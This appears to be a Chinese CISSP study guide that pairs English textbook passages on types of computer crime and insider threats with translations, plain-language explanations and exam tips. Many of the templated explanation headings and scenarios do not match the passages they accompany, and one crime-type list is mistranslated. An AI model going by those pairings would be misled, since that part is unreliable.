简而言之,计算机犯罪是指涉 及计算机的犯罪(或违反法律或法规的行为)。 该犯罪可能是针对计算机本身 的,也可能是计算机被用于实际实施犯罪。 每一类计算机犯罪都代表了攻击的 目的及其预期结果。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

IPS 放在线路中,误报可能影响可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 23 / PDF P1302

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Any individual who violates one or more of your security policies is considered to be an attacker. An attacker uses different techniques to achieve a specific goal. Understanding the goals helps clarify the different types of attacks. Remember that crime is crime, and the motivations behind computer crime are no different from the motivations behind any other type of crime. The only real difference may be in the methods the attacker uses to strike.

Computer crimes are generally classified as one of the following types: Military and intelligence attacks Business attacks Financial attacks Terrorist attacks Grudge attacks Thrill attacks Hacktivist attacks It is important to understand the differences among the categories of computer crime to best understand how to protect a system and react when an attack occurs. The type and amount of evidence left by an attacker is often dependent on their expertise. In the following sections, we'll discuss the different categories of computer crimes and the types of evidence you might find after an attack. This evidence can help you determine the attacker's actions and intended target.

You may find that your system was only a link in the chain of network hops used to reach the real victim, making the trail harder to follow back to the true attacker. Military and Intelligence Attacks Military and intelligence attacks are launched primarily to obtain secret and restricted information from law enforcement or military and technological research sources. The disclosure of such information could compromise investigations, disrupt military planning, and threaten national security. Attacks to gather military information or other sensitive intelligence often precede other, more damaging attacks. An attacker may be looking for the following kinds of information:

中文直译 / 整理

任何违反您一项或多项安全政策的个人都被视为攻击者。 攻击者使用不同的技 术来实现特定目标。 理解这些目标有助于明确不同类型的攻击。 请记住,犯罪 就是犯罪,计算机犯罪背后的动机与其他类型的犯罪并无不同。 唯一的真正区 别可能在于攻击者所使用的攻击手段。 计算机犯罪通常分为以下类型: 军事和情报攻击 商业攻击 金融攻击 恐怖袭击 泄愤攻击 激进攻击 黑客行动主义攻击 理解计算机犯罪各类别的差异对于更好地了解如何保护系统以及在遭受攻击时 如何应对至关重要。 攻击者留下的证据类型和数量通常取决于其专业水平。 在 以下章节中,我们将讨论计算机犯罪的不同类别以及攻击后可能发现的证据类 型。 这些证据可以帮助您确定攻击者的行动和目标。 您可能会发现,您的系统 只是攻击者用来抵达真实受害者的网络跳转链中的一环,这使得追踪回真正的 攻击者更加困难。 军事与情报攻击 军事与情报攻击主要旨在从执法部门、军事机构或科技研究来源获取机密和受 限信息。 此类信息的泄露可能危及调查、扰乱军事规划并威胁国家安全。 收集 军事信息或其他敏感情报的攻击通常会先于其他更具破坏性的攻击发生。 攻击者可能正在寻找以下类型的信息:

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 24 / PDF P1303

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Military descriptive information of any type, including deployment information, readiness information, and order of battle plans Secret intelligence gathered for military or law enforcement purposes Descriptions and storage locations of evidence obtained in a criminal investigation Any secret information that could be used in a later attack Because of the sensitive nature of information collected and used by the military and intelligence agencies, their computer systems are often attractive targets for experienced attackers. To protect from more numerous and more sophisticated attackers, you will generally find more formal security policies in place on systems that house such information.

As you learned in Chapter 1, “Security Governance Through Principles and Policies,” data can be classified according to sensitivity and stored on systems that support the required level of security. It is common to find stringent perimeter security as well as internal controls to limit access to classified documents on military and intelligence agency systems. You can be sure that serious attacks to acquire military or intelligence information are carried out by professionals. Professional attackers are generally very thorough in covering their tracks. There is usually little evidence to collect after such an attack.

Attackers in this category are the most successful and the most satisfied when no one is aware that an attack occurred. Advanced Persistent Threats Recent years have marked the rise of sophisticated attacks known as advanced persistent threats (APTs). The attackers are well funded and have advanced technical skills and resources. They act on behalf of a nation-state, organized crime, terrorist group, or other sponsor and wage highly effective attacks against a very focused target. Business Attacks Business attacks focus on illegally jeopardizing the confidentiality, integrity, or availability of information and systems operated by a business.

中文直译 / 整理

任何类型的军事描述信息,包括部署信息、战备信息和作战序列计划 为军事或执法目的收集的情报 刑事调查中获取的证据的描述及其存储位置 任何可能被用于后续攻击的机密信息 由于军事和情报机构收集和使用的信息具有高度敏感性,其计算机系统常常成 为经验丰富的攻击者的目标。 为了防范数量更多、技术更复杂的攻击者,通常 会在存储此类信息的系统上实施更正式的安全策略。 正如您在第1章“通过原则 与政策实现安全治理”中所学,数据可根据敏感性进行分类,并存储在能够提 供所需安全级别的系统上。 在军事和情报机构的系统中,通常会采取严格的边 界安全措施以及内部控制措施,以限制对机密文件的访问。 您可以确信,旨在获取军事或情报信息的严重攻击均由专业人士实施。 专业 攻击者通常会非常彻底地掩盖其踪迹。 此类攻击后通常几乎无法收集到任何 证据。 这一类攻击者最为成功,且当无人察觉攻击发生时,他们最为满意。 高级持续性威胁 近年来,出现了被称为高级持续性威胁(APTs)的复杂攻击。 这些攻击 者资金充足,具备先进的技术技能和资源。 他们代表国家、有组织犯罪、 恐怖组织或其他赞助方行动,针对特定目标发动高效攻击。

商业攻击 商业攻击旨在非法破坏企业运营的信息和系统的机密性、完整性或可用性。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
政策 政策是高层原则,说明必须遵守什么。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 25 / PDF P1304

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

For example, an attacker might focus on obtaining an organization's confidential information. This could be information that is critical to the operation of the organization, such as a secret recipe, or information that could damage the organization's reputation if disclosed, such as personal information about its employees. The gathering of a competitor's confidential intellectual property, also called corporate espionage or industrial espionage, is not a new phenomenon. Businesses have used illegal means to acquire competitive information for many years. Perhaps what has changed is the source of the espionage, as state-sponsored espionage has become a significant threat.

The temptation to steal a competitor's trade secrets and the ease with which a savvy attacker can compromise some computer systems makes this type of attack attractive. The goal of these attacks may be solely to extract confidential information. The use of the information gathered during the attack usually causes more damage than the attack itself. A business that has suffered an attack of this type can be put into a position from which it might not ever recover. Other attacks may focus on integrity and/or availability of information.

For example, although ransomware attacks may jeopardize the confidentiality of information, their primary purpose is to disrupt availability, preventing the target from accessing their own data and forcing the payment of a ransom to restore access. Financial Attacks Financial attacks are carried out to unlawfully obtain money or services. They are the type of computer crime you most commonly hear about in the news. The goal of a financial attack could be to steal credit card numbers, increase the balance in a bank account, or obtain fraudulent funds transfers. Shoplifting and burglary are both examples of financial attacks.

You can usually tell the sophistication of the attacker by the dollar amount of the damages. Less sophisticated attackers seek easier targets, but although the damages are usually minimal, they can add up over time. Financial attacks launched by sophisticated attackers can result in substantial damages. Even attacks that siphon off small amounts of money in each transaction can accumulate and become serious financial attacks that result in losses amounting to millions of dollars. As with the attacks previously described, the ease with which you can detect an attack and track an attacker is largely dependent on the attacker's skill level.

中文直译 / 整理

例如,攻击者可能专注于获取组织的机密信息。 这些信息可能是对组织运营至 关重要的内容,例如秘密配方,也可能是若被泄露会损害组织声誉的信息,例 如员工的个人信息。 收集竞争对手的机密知识产权,也称为企业间谍活动或工 业间谍活动,并非新现象。 多年来,企业一直使用非法手段获取竞争信息。 或 许发生变化的是间谍活动的来源,因为国家支持的间谍活动已成为重大威胁。 窃取竞争对手商业秘密的诱惑,以及经验丰富的攻击者轻易破坏某些计算机系 统的便利性,使得此类攻击极具吸引力。 这些攻击的目标可能仅仅是窃取机密信息。 攻击期间收集到的信息通常造成 的损害比攻击本身更大。 遭受此类攻击的企业可能陷入无法恢复的境地。 其他攻击可能侧重于信息的完整性和/或可用性。 例如,尽管勒索软件攻击可 能危及信息的机密性,但其主要目的是破坏可用性,阻止目标访问自己的数据, 并迫使支付赎金以恢复访问权限。 金融攻击 金融攻击是为了非法获取金钱或服务而实施的。 这是你在新闻中最常听到的 计算机犯罪类型。 金融攻击的目标可能是窃取信用卡号、增加银行账户余额 或获取欺诈性资金转账。 商店盗窃和入室盗窃都是金融攻击的例子。

通常可以根据损害的金额判断攻 击者的 sophistication。 不太复杂的攻击者倾向于寻找更容易的目标,尽管 造成的损失通常较小,但长期累积起来也可能很严重。 由复杂攻击者发起的金融攻击可能导致重大损失。 即使每次交易仅窃取少量资 金,累积起来也可能演变为严重的金融攻击,造成数百万美元的损失。 与前述 攻击类似,您检测攻击和追踪攻击者的难易程度在很大程度上取决于攻击者的 技能水平。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 26 / PDF P1305

第 1305 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Financial attacks may also take the form of cybercrime for hire, where the attacker engages in mercenary activity, conducting cyberattacks against targets for their clients. One of the most common examples of this type of attack is in the conduct of distributed denial-of-service (DDoS) attacks. Attackers have assembled large botnets of systems they then lease out to customers for use in DDoS attacks. Here, the attacker actually has no motivation other than receiving money from the customer, who has some other motivation for the attack. Terrorist Attacks Terrorist attacks are a reality in modern society.

Our increasing reliance on information systems makes them more and more attractive to terrorists. Such attacks differ from military and intelligence attacks. The purpose of a terrorist attack is to disrupt normal life and instill fear, whereas a military or intelligence attack is designed to extract secret information. Intelligence gathering generally precedes any type of terrorist attack. The very systems that are victims of a terrorist attack were probably compromised in an earlier attack to collect intelligence. The more diligent you are in detecting attacks of any type, the better prepared you will be to intervene before more serious attacks occur.

Possible targets of a computer terrorist attack could be systems that regulate power plants or control telecommunications or power distribution. Many such control and regulatory systems are computerized and vulnerable to terrorist action. In fact, the possibility exists of a simultaneous physical and computerized terrorist attack. Our ability to respond to such an attack would be greatly diminished if the physical attack were simultaneously launched with a computer attack designed to knock out power and communications.

Most large power and communications companies have dedicated a security staff to ensure the security of their systems, but many smaller businesses that have systems connected to the Internet are more vulnerable to attacks. You must diligently monitor your systems to identify any attacks and then respond swiftly when an attack is discovered. Grudge Attacks Grudge attacks are attacks that are carried out to damage an organization or a person. The damage could be in the loss of information or information processing capabilities or harm to the organization or a person's reputation.

中文直译 / 整理

金融攻击也可能表现为网络犯罪外包形式,攻击者以雇佣兵方式为客户提供 网络攻击服务。 这类攻击最常见的一种例子是分布式拒绝服务(DDoS)攻 击。 攻击者已组建了庞大的僵尸网络系统,并将其出租给客户用于DDoS攻 击。 在此类攻击中,攻击者唯一的动机仅仅是收取客户的费用,而客户则另 有攻击动机。 恐怖袭击 恐怖袭击是现代社会的现实。 我们对信息系统的依赖日益增加,使其对恐怖分 子更具吸引力。 此类袭击不同于军事和情报袭击。 恐怖袭击的目的是扰乱正常 生活并制造恐惧,而军事或情报袭击则旨在窃取机密信息。 情报收集通常发生 在任何类型的恐怖袭击之前。 遭受恐怖袭击的系统,很可能在更早的袭击中已 被渗透以收集情报。 您对任何类型袭击的检测越细致,就越能更好地在更严重 的袭击发生前采取干预措施。 计算机恐怖袭击的潜在目标可能是控制发电厂、通信或电力分配的系统。 许多 此类控制和监管系统均已实现计算机化,容易受到恐怖行动的攻击。 事实上, 同时发生物理和计算机恐怖袭击的可能性是存在的。 如果物理袭击与旨在切断 电力和通信的计算机袭击同时发动,我们将大大削弱应对此类袭击的能力。

大多数大型电力和通信公司都配备了专门的安全人员,以确保其系统的安全, 但许多连接到互联网的小型企业更容易受到攻击。 您必须认真监控您的系统, 以识别任何攻击,并在发现攻击时迅速作出响应。 报复性攻击 怨恨攻击是指旨在损害某个组织或个人的攻击行为。 这种损害可能表现为信息 或信息处理能力的丧失,或对组织或个人声誉的伤害。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1305 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 27 / PDF P1306

第 1306 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

The motivation behind a grudge attack is usually a feeling of resentment, and the attacker could be a current or former employee or someone who wishes ill will upon an organization. The attacker is disgruntled with the victim and takes out their frustration in the form of a grudge attack. An employee who has recently been fired is a prime example of a person who might carry out a grudge attack to “get back” at the organization. Another example is a person who has been rejected in a personal relationship with another employee. The person who has been rejected might launch an attack to destroy data on the victim's system.

中文直译 / 整理

怨恨攻击的动机通常是怨恨情绪,攻击者可能是现任或前任员工,或任何对组 织怀有恶意的人。 攻击者对受害者心怀不满,并以怨恨攻击的形式发泄其挫败 感。 最近被解雇的员工是可能实施报复攻击以“报复”组织的典型例子。 另一个例 子是与另一名员工发生个人关系后被拒绝的人。 被拒绝的人可能会发动攻击, 以破坏受害者系统上的数据。

小白解释

场景先行:你是公司的安全负责人,正在读第 1306 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1306 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 28 / PDF P1307

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

The Insider Threat It's common for security professionals to focus on the threat from outside an organization. Indeed, many of our security technologies are designed to keep unauthorized individuals out. We often don't pay enough (or much!) attention to protecting our organizations against the malicious insider, even though they often pose the greatest risk to our computing assets. One of the authors of this book had a consulting engagement with a medium-sized subsidiary of a large, well-known corporation. The company had suffered a serious security breach, involving the theft of thousands of dollars and the deliberate destruction of sensitive corporate information.

The IT leaders in the organization needed someone to work with them to diagnose the cause of the event and protect themselves against similar events in the future. After only a very small amount of digging, it became apparent that they were dealing with an insider attack. The intruder's actions demonstrated knowledge of the company's IT infrastructure as well as an understanding of which data was most important to the company's ongoing operations. Additional investigation revealed that the culprit was a former employee who ended his employment with the firm on less-than-favorable terms. He left the building with a chip on his shoulder and an ax to grind.

Unfortunately, he was a system administrator with a wide range of access to corporate systems, and the company had an immature deprovisioning process that failed to remove all of his access upon his termination. He simply found several accounts that remained active and used them to access the corporate network through a VPN. The moral of this story? Don't underestimate the insider threat. Take the time to evaluate your controls to mitigate the risk that malicious current and former employees pose to your organization. It's also important to understand that not all insider attacks are malicious in origin. Employees with privileged access to systems may make errors

中文直译 / 整理

内部威胁 安全专业人员通常关注来自组织外部的威胁。 事实上,我们的许多安全技术 都是为了防止未经授权的人员进入而设计的。 我们常常没有给予内部恶意人 员足够的(甚至丝毫的)关注,尽管他们往往对我们的计算资产构成最大的 风险。 本书的一位作者曾为一家大型知名公司的中型子公司提供咨询服务。 该公 司曾遭受严重安全泄露事件,导致数千美元被盗,以及敏感公司信息被故 意破坏。 组织中的IT负责人需要有人与他们合作,诊断事件原因,并防止 未来再次发生类似事件。 经过极少量的调查,便明显发现他们遭遇的是一起内部攻击。 入侵者的行动 显示出其对公司IT基础设施的深入了解,以及对哪些数据对公司的持续运 营最为重要的认知。 进一步调查发现,肇事者是一名前雇员,他以不愉快的方式结束了与公司 的雇佣关系。 他离开公司时心怀不满,满腹怨恨。 不幸的是,他是一名系统管理员,拥有对公司系统的广泛访问权限,而公 司缺乏完善的离职流程,未能在其离职后彻底撤销其所有访问权限。 他只 需找到几个仍处于激活状态的账户,并通过VPN利用这些账户访问公司网 络。 这个故事的教训是什么? 不要低估内部威胁。

花时间评估您的控制措施, 以减轻恶意现任和前任员工对您组织构成的风险。 同样重要的是要理解,并非所有内部攻击都源于恶意。 拥有系统特权访问权限 的员工可能会犯错

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 29 / PDF P1308

第 1308 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

that jeopardize security and unintentionally enable an external attacker to carry out a malicious attack. Your security policy should address the potential of insider attacks. For example, as soon as an employee is terminated, all system access for that employee should be terminated. This action reduces the likelihood of a grudge attack and removes unused access accounts that could be used in future attacks. Although most grudge attackers are just disgruntled people with limited attacking and cracking abilities, some possess the skills to cause substantial damage. An unhappy cracker can be a handful for security professionals.

Take extreme care when a person with known cracking ability leaves your company. At the least, you should perform a vulnerability assessment of all systems the person could access. You may be surprised to find one or more “backdoors” left in the system. (For more on backdoors, see Chapter 21.) But even in the absence of any backdoors, a former employee who is familiar with the technical architecture of the organization may know how to exploit its weaknesses. Grudge attacks can be devastating if allowed to occur unchecked. Diligent monitoring and assessing systems for vulnerabilities is the best protection from most grudge attacks.

Thrill Attacks Thrill attacks are the attacks launched only for the fun of it. Attackers who lack the ability to devise their own attacks will often download programs that do their work for them. These attackers are often called script kiddies because they run only other people's programs, or scripts, to launch an attack. The main motivation behind these attacks is the “high” of successfully breaking into a system. If you are the victim of a thrill attack, the most common fate you will suffer is a service interruption. Although an attacker of this type may destroy data, the main motivation is to compromise a system and perhaps use it to launch an attack against another victim.

One common type of thrill attack involves website defacements, where the attacker compromises a web server and replaces an organization's legitimate web content with other pages, often boasting about the attacker's skills. For example, attackers launched a series of automated website defacement attacks in 2017 that exploited a vulnerability in the widely used WordPress

中文直译 / 整理

这些错误会危及安全,并无意中使外部攻击者得以实施恶意攻击。 您的安全策略应涵盖内部攻击的可能性。 例如,一旦员工被解雇,应立即 终止该员工的所有系统访问权限。 此操作可降低报复性攻击的可能性,并 移除可能被用于未来攻击的未使用访问账户。 尽管大多数报复性攻击者只是心怀不满、攻击和破解能力有限的人,但有些人 具备造成重大破坏的技能。 一个心怀不满的破解者可能给安全专业人员带来很 大麻烦。 当一位已知具备破解能力的人员离开您的公司时,务必格外小心。 至 少,您应对该人员可能访问的所有系统进行漏洞评估。 您可能会惊讶地发现系 统中遗留了一个或多个“后门”。 (有关后门的更多信息,请参阅第21章。 ) 但即使没有任何后门,熟悉组织技术架构的前员工也可能知道如何利用其弱点。 如果放任不管,报复性攻击可能造成毁灭性后果。 勤勉地监控并评估系统漏 洞是防范大多数报复性攻击的最佳保护措施。 刺激攻击 刺激攻击是仅为了娱乐而发起的攻击。 缺乏自行设计攻击能力的攻击者通 常会下载程序来替他们完成攻击工作。 这些攻击者常被称为脚本小子,因为他 们仅运行他人的程序或脚本来发起攻击。 这类攻击的主要动机是成功入侵系统后获得的“快感”。

如果你是刺激攻击的 受害者,最常遭遇的命运是服务中断。 尽管此类攻击者可能破坏数据,但其主 要动机是入侵系统,并可能利用该系统对其他受害者发起攻击。 一种常见的刺激性攻击类型涉及网站篡改,攻击者入侵Web服务器,将组织 的合法网页内容替换为其他页面,通常炫耀其技术能力。 例如,2017年,攻 击者发起了一系列自动化的网站篡改攻击,利用了广泛使用的WordPress中 的漏洞

小白解释

场景先行:你是公司的安全负责人,正在读第 1308 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1308 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

